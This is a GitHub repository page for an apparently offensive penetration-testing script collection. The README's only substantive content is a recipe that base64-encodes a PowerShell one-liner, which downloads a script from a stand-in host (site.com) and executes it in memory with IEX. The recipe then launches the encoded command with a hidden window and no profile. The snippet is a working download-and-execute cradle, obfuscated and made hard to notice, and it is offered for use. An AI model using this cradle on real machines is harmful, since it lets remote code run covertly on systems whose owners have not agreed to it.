Skip to content

pr0b3r7/PenTesting-Scripts

 
 

Repository files navigation

PenTesting-Scripts

A ton of helpful tools

Powershell Base64 on Linux

In a terminal run the following command to encode your powershell one-liner

$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://site.com/script.js')" | iconv -t UTF-16LE | base64 -w 0

Now in Powershell run the following command to test encoding:

powershell -w hidden -nop -enc <BASE_64_STRING>

About

A ton of helpful tools

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 69.9%
  • Python 24.7%
  • Batchfile 2.7%
  • Lua 2.7%